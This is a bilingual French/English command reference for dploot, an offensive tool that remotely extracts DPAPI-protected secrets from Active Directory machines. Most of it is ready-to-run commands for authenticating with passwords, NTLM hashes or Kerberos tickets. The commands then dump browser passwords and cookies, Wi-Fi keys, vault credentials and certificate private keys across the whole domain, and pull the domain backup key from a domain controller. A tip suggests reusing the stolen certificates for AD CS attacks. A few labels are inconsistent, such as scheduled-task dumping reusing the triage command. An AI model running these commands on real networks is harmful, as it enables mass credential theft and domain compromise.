dploot

Outil de pillage DPAPI pour les environnements Active Directory. Extrait à distance les identifiants de navigateurs, les mots de passe Wi-Fi, les certificats et les secrets DPAPI via SMB. DPAPI looter for Active Directory environments. Remotely dumps browser credentials, Wi-Fi passwords, certificates, and DPAPI secrets via SMB.

↗ https://github.com/zblurx/dploot

Overview

dploot automates DPAPI (Data Protection API) secret extraction across an Active Directory domain. It can remotely dump browser saved passwords (Chrome, Edge), Wi-Fi credentials, certificates, vault credentials, and scheduled task passwords — all without touching disk on the target.

Authentication Methods

Username + password

dploot computers -d domain.local -u user -p 'password' -t 10.10.10.1

Pass-the-hash

dploot computers -d domain.local -u user -H :NTLMhash -t 10.10.10.1
# Pass-the-ticket (with KRB5CCNAME)
export KRB5CCNAME=/tmp/user.ccache
dploot computers -d domain.local -k -t 10.10.10.1

Dumping Credentials

Browser credentials (Chrome, Edge, Firefox)

dploot browser -d domain.local -u admin -p 'password' -t 10.10.10.1

Browser cookies

dploot browser -d domain.local -u admin -p 'password' -t 10.10.10.1 --cookies

Wi-Fi credentials

dploot wifi -d domain.local -u admin -p 'password' -t 10.10.10.1

Vault credentials (Windows Credential Manager)

dploot vaults -d domain.local -u admin -p 'password' -t 10.10.10.1

Certificate private keys

dploot certificates -d domain.local -u admin -p 'password' -t 10.10.10.1

Scheduled task credentials

dploot triage -d domain.local -u admin -p 'password' -t 10.10.10.1

All (triage = dump everything)

dploot triage -d domain.local -u admin -p 'password' -t 10.10.10.1

Domain-Wide Dumping

Dump from all computers in the domain

dploot computers -d domain.local -u admin -p 'password'

Then dump browser creds from all

dploot browser -d domain.local -u admin -p 'password'

Limit to specific target

dploot browser -d domain.local -u admin -p 'password' -t dc01.domain.local

DPAPI Masterkey Recovery

Backup operator masterkeys (from Domain Controller)

dploot backupkey -d domain.local -u admin -p 'password' -t dc01.domain.local

With domain backup key, decrypt any masterkey offline

dploot masterkeys -d domain.local -u user -p 'pass' -t 10.10.10.1 \
  --pvkfile domain_backup.pvk

Decrypt blobs offline with masterkeys

dploot blob -d domain.local --masterkeys masterkeys.json -t 10.10.10.1

Output

Save output to directory

dploot triage -d domain.local -u admin -p 'password' -t 10.10.10.1 -o /tmp/loot/

JSON output

dploot browser -d domain.local -u admin -p 'password' -t 10.10.10.1 --json

Tips

  • Requires local admin access on the target machine
  • The Domain backup key (dploot backupkey) can decrypt ANY user’s DPAPI masterkeys — very powerful
  • Browser credentials include saved passwords, credit cards, and autofill data
  • Certificates found may be usable for AD CS attacks (Certipy / PKINIT authentication)
Command reference
dploot [module] [options]

Modules:
  triage          Dump all DPAPI secrets
  browser         Browser credentials + cookies
  wifi            Wi-Fi passwords
  vaults          Credential Manager vaults
  certificates    Certificate private keys
  masterkeys      Decrypt masterkey files
  backupkey       Retrieve domain backup key from DC
  blob            Decrypt DPAPI blob
  computers       Enumerate domain computers

Common options:
  -d DOMAIN       Domain name
  -u USER         Username
  -p PASSWORD     Password
  -H HASH         NTLM hash
  -k              Kerberos auth (KRB5CCNAME)
  -t TARGET       Target host (IP or hostname)
  -o DIR          Output directory
  --json          JSON output
  --debug         Debug mode

Vue d’ensemble

dploot automatise l’extraction des secrets DPAPI (Data Protection API) à travers un domaine Active Directory. Il peut extraire à distance les mots de passe sauvegardés dans les navigateurs (Chrome, Edge), les identifiants Wi-Fi, les certificats, les identifiants du coffre-fort Windows, et les mots de passe des tâches planifiées, le tout sans toucher le disque de la cible.

Méthodes d’authentification

# Nom d'utilisateur + mot de passe
dploot computers -d domain.local -u user -p 'password' -t 10.10.10.1

# Pass-the-hash
dploot computers -d domain.local -u user -H :NTLMhash -t 10.10.10.1
# Pass-the-ticket (avec KRB5CCNAME)
export KRB5CCNAME=/tmp/user.ccache
dploot computers -d domain.local -k -t 10.10.10.1

Extraction des identifiants

# Identifiants de navigateur (Chrome, Edge, Firefox)
dploot browser -d domain.local -u admin -p 'password' -t 10.10.10.1

# Cookies de navigateur
dploot browser -d domain.local -u admin -p 'password' -t 10.10.10.1 --cookies

# Identifiants Wi-Fi
dploot wifi -d domain.local -u admin -p 'password' -t 10.10.10.1

# Identifiants du coffre-fort (Gestionnaire d'identifiants Windows)
dploot vaults -d domain.local -u admin -p 'password' -t 10.10.10.1

# Clés privées de certificats
dploot certificates -d domain.local -u admin -p 'password' -t 10.10.10.1

# Identifiants de tâches planifiées
dploot triage -d domain.local -u admin -p 'password' -t 10.10.10.1

# Tout (triage = tout extraire)
dploot triage -d domain.local -u admin -p 'password' -t 10.10.10.1

Extraction à l’échelle du domaine

# Extraire depuis tous les ordinateurs du domaine
dploot computers -d domain.local -u admin -p 'password'

# Puis extraire les identifiants de navigateur de tous
dploot browser -d domain.local -u admin -p 'password'

# Limiter à une cible spécifique
dploot browser -d domain.local -u admin -p 'password' -t dc01.domain.local

Récupération de masterkeys DPAPI

# Clé de sauvegarde des opérateurs de sauvegarde (depuis le contrôleur de domaine)
dploot backupkey -d domain.local -u admin -p 'password' -t dc01.domain.local

# Avec la clé de sauvegarde du domaine, déchiffrer n'importe quelle masterkey hors ligne
dploot masterkeys -d domain.local -u user -p 'pass' -t 10.10.10.1 \
  --pvkfile domain_backup.pvk

# Déchiffrer des blobs hors ligne avec les masterkeys
dploot blob -d domain.local --masterkeys masterkeys.json -t 10.10.10.1

Sortie

# Sauvegarder la sortie dans un répertoire
dploot triage -d domain.local -u admin -p 'password' -t 10.10.10.1 -o /tmp/loot/

# Sortie JSON
dploot browser -d domain.local -u admin -p 'password' -t 10.10.10.1 --json

Conseils

  • Nécessite un accès admin local sur la machine cible
  • La clé de sauvegarde de domaine (dploot backupkey) peut déchiffrer les masterkeys DPAPI de N’IMPORTE QUEL utilisateur : très puissant
  • Les identifiants de navigateur incluent les mots de passe sauvegardés, les cartes bancaires et les données de remplissage automatique
  • Les certificats trouvés peuvent être utilisables pour des attaques AD CS (Certipy / authentification PKINIT)
Référence des commandes
dploot [module] [options]

Modules:
  triage          Dump all DPAPI secrets
  browser         Browser credentials + cookies
  wifi            Wi-Fi passwords
  vaults          Credential Manager vaults
  certificates    Certificate private keys
  masterkeys      Decrypt masterkey files
  backupkey       Retrieve domain backup key from DC
  blob            Decrypt DPAPI blob
  computers       Enumerate domain computers

Common options:
  -d DOMAIN       Domain name
  -u USER         Username
  -p PASSWORD     Password
  -H HASH         NTLM hash
  -k              Kerberos auth (KRB5CCNAME)
  -t TARGET       Target host (IP or hostname)
  -o DIR          Output directory
  --json          JSON output
  --debug         Debug mode